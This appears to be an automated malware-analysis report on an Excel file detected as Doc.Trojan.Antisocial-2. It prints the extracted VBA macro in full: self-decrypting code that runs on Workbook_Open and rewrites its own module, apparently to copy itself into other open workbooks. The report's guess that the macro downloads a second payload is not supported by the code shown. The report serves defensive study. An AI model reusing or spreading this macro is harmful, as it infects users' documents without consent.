Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e6724f2caacf04a9…

MALICIOUS

Office (OLE)

34.5 KB Created: 1996-10-14 23:33:28 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 4e66da04256688321d5c513d7552604a SHA-1: e4bf935858945c3713cc5bcd07a486a343a7259f SHA-256: e6724f2caacf04a9e861783942e4a6ed02486472fae108775fe0bb5076584071
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing VBA macros, specifically a Workbook_Open macro which is a common technique for initial execution. The macro code is obfuscated, making its exact function difficult to determine, but it is highly likely designed to download and execute a secondary payload. The ClamAV detection 'Doc.Trojan.Antisocial-2' further supports its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.Antisocial-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Antisocial-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5108 bytes
SHA-256: e5c115fbf6e39ac5cba1c08695adfbe42a9982ffa3d5ba732b7dc85cdc4dd6e2
Detection
ClamAV: Doc.Trojan.Antisocial-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
If Workbooks.Count > 1 Then
For d = 9 To 19: C$ = ""
I = (ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.Lines(d, 1))
f = (Mid(I, 2, 1)): For X = 3 To Len(I): B$ = Asc(Mid(I, X, 1)) - f: C$ = C$ & Chr(B$): Next X: A = C$
ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine d, A: Next d
Call Good_Faith: End If: End Sub
Private Sub Good_Faith()
'6Gvvroigzout4Joyvrg Grkxzy&C&Lgryk
'5Xjy%HR%B%Ymnx\twpgttp3[GUwtojhy3[GHtrutsjsyx3Nyjr-6.3HtijRtizqj
'5Ktw%i%B%>%Yt%6>?%H)%B%''?%N%B%-HR3Qnsjx-i1%6..
'3i#@#Lqw+Uqg#-#;,#.#4=#Iru#[#@#4#Wr#Ohq+L,=#E'#@#Dvf+Plg+L/#[/#4,,#.#i=#F'#@#F'#)#Fku+E',=#Qh{w#[=#D#@#F'
'3WklvZrunerrn1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh1UhsodfhOlqh#g/#%*%#)#i#)#D=#Qh{w#g
'7TJ'D'JT5Spulz/83'JT5Jv|u{VmSpulz0
'1Gps!Iptu!>!2!Up!Xpslcpplt/Dpvou
'7^p{o'^vyrivvrz5P{lt/Ovz{05]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl
'75Klsl{lSpulz'83'5Jv|u{VmSpulzA'5HkkMyvtZ{ypun'TJA'Luk'^p{o
'6]uxqhuuqy4Ozks.Nuyz/4Yg|kGy&LorkTgsk@C]uxqhuuqy4Ozks.Nuyz/4L{rrTgsk
'1Ofyu!Iptu!(Hppe!Gbjui!Cz!Mzt!Lpwjdl///!Ifmmp-!WYfs(t!Boe!BWfs(t
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /opt/analyzer/scan_staging/a669ea8ea97d4e2686c6e4dc0f8973d1.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 12039 bytes
' Line #0:
' 	FuncDefn (Private Sub Workbook_Open())
' Line #1:
' 	Ld Workbooks 
' 	MemLd Count 
' 	LitDI2 0x0001 
' 	Gt 
' 	IfBlock 
' Line #2:
' 	StartForVariable 
' 	Ld d 
' 	EndForVariable 
' 	LitDI2 0x0009 
' 	LitDI2 0x0013 
' 	For 
' 	BoS 0x0000 
' 	LitStr 0x0000 ""
' 	St C$ 
' Line #3:
' 	Ld d 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	Paren 
' 	St I 
' Line #4:
' 	Ld I 
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	Paren 
' 	St False 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld X 
' 	EndForVariable 
' 	LitDI2 0x0003 
' 	Ld I 
' 	FnLen 
' 	For 
' 	BoS 0x0000 
' 	Ld I 
' 	Ld X 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	Ld False 
' 	Sub 
' 	St B$ 
' 	BoS 0x0000 
' 	Ld C$ 
' 	Ld B$ 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St C$ 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld X 
' 	EndForVariable 
' 	NextVar 
' 	BoS 0x0000 
' 	Ld C$ 
' 	St A 
' Line #5:
' 	Ld d 
' 	Ld A 
' 	LitDI2 0x0001 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld d 
' 	EndForVariable 
' 	NextVar 
' Line #6:
' 	ArgsCall (Call) Good_Faith 0x0000 
' 	BoS 0x0000 
' 	EndIfBlock 
' 	BoS 0x0000 
' 	EndSub 
' Line #7:
' 	FuncDefn (Private Sub Good_Faith())
' Line #8:
' 	QuoteRem 0x0000 0x0022 "6Gvvroigzout4Joyvrg Grkxzy&C&Lgryk"
' Line #9:
' 	QuoteRem 0x0000 0x0040 "5Xjy%HR%B%Ymnx\twpgttp3[GUwtojhy3[GHtrutsjsyx3Nyjr-6.3HtijRtizqj"
' Line #10:
' 	QuoteRem 0x0000 0x002F "5Ktw%i%B%>%Yt%6>?%H)%B%''?%N%B%-HR3Qns
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.